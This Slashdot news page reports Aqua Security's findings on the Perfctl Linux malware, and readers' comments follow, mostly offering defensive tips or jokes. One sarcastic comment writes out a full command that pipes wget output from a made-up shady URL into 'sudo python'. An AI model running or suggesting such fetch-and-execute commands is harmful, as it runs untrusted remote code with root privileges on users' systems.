Follow Slashdot blog updates by subscribing to our blog RSS feed

 



Forgot your password?
typodupeerror
×
Security Linux

Thousands of Linux Systems Infected By Stealthy Malware Since 2021 30

A sophisticated malware strain has infected thousands of Linux systems since 2021, exploiting over 20,000 common misconfigurations and a critical Apache RocketMQ vulnerability, researchers at Aqua Security reported. Dubbed Perfctl, the malware employs advanced stealth techniques, including rootkit installation and process name mimicry, to evade detection. It persists through system reboots by modifying login scripts and copying itself to multiple disk locations. Perfctl hijacks systems for cryptocurrency mining and proxy services, while also serving as a backdoor for additional malware. Despite some antivirus detection, the malware's ability to restart after removal has frustrated system administrators.
This discussion has been archived. No new comments can be posted.

Thousands of Linux Systems Infected By Stealthy Malware Since 2021

Comments Filter:
  • by OrangeTide ( 124937 ) on Friday October 04, 2024 @01:14PM (#64839963) Homepage Journal

    It's pretty important to have some intrusion detection system enabled on your Linux servers.
    Tripwire is a classic but there are others like AIDE. You can also do some very limited detection using the distro's own package checksum tools.
    Enabling kernel module signatures is easy these days and default on many distros. It keeps some really nasty business from being easily loaded.
    Keeping people out in the first place is of course your best first line of defense. Sshguard or fail2ban is a good start, but there are lots of other options as well.

    At the end of the day. Keep back-ups of important data, and wipe systems you suspect are compromised. If you feel that there is a firmware compromise, you will of course take that system completely out of service and replace it with new hardware.

  • by Seven Spirals ( 4924941 ) on Friday October 04, 2024 @01:38PM (#64840039)
    Say what? Some shitty MQ doucheware gets hacked and somehow this is the fault of Linux? Uhm, I don't think so. Try re-writing these clickbait headlines with your thinking cap on.
  • by PPH ( 736903 ) on Friday October 04, 2024 @02:11PM (#64840155)

    systemctl restart perfctl

  • Obviously not Linux; but are other, *Nix Systems affected?

    For example, macOS?

  • It's too bad they didn't use an intrusion detection and response solution.
    • You are aware that CrowdStrike can also be used to "protect" Linux systems? And that there have been two outages relatively recently which had a lot in common with that Windows disaster a few months back? I think they support one Red Hat configuration and one Debian configuration, but expecting them to test their updates before distributing them appears to be overly optimistic.

    • It's too bad they didn't use an intrusion detection and response solution.

      While also stopping every other bit of traffic passing through, to, and from your server. /s

      CrowdStrike is an amazing effective traffic block tool. /s

  • Has a solution for these kinds of problems.

  • Since most malware is used for cryptocurrency mining, listen for the cooling fan spinning up unexpectedly.
    Of course, now someone will write malware that pauses mining whenever the fan is about to engage ...

  • How does this “sophisticated” malware strain get onto the Linux systems?

    “A sophisticated malware strain has infected thousands of Linux systems .. and a critical Apache RocketMQ vulnerability” that was patched last year in Apache RocketMQ.
    • Same way it does under Windows: Stackoverflow told me to run "wget -O - 'https://someshadyurlthatyourcontentfiltershouldblock.net/idiot-admins/some_stupid_pipy_module.py' | sudo python some_stupid_pipy_module.py"

Trap full -- please empty.

Working...